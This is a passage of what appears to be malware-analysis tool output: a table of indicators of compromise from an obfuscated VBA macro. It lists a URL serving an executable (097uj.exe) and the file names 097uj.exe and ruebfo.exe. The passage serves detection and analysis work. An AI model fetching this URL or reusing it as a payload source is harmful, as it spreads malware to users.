875. |            |                      | (option --decode to see all)            |
876. | IOC        | http://detocoffee.oj | URL (obfuscation: VBA expression)       |
877. |            | iji.net/45ygege/097u |                                         |
878. |            | j.exe                |                                         |
879. | IOC        | 097uj.exe            | Executable file name (obfuscation: VBA  |
880. |            |                      | expression)                             |
881. | IOC        | ruebfo.exe           | Executable file name (obfuscation: VBA  |
882. |            |                      | expression)                             |
883. +------------+----------------------+-----------------------------------------+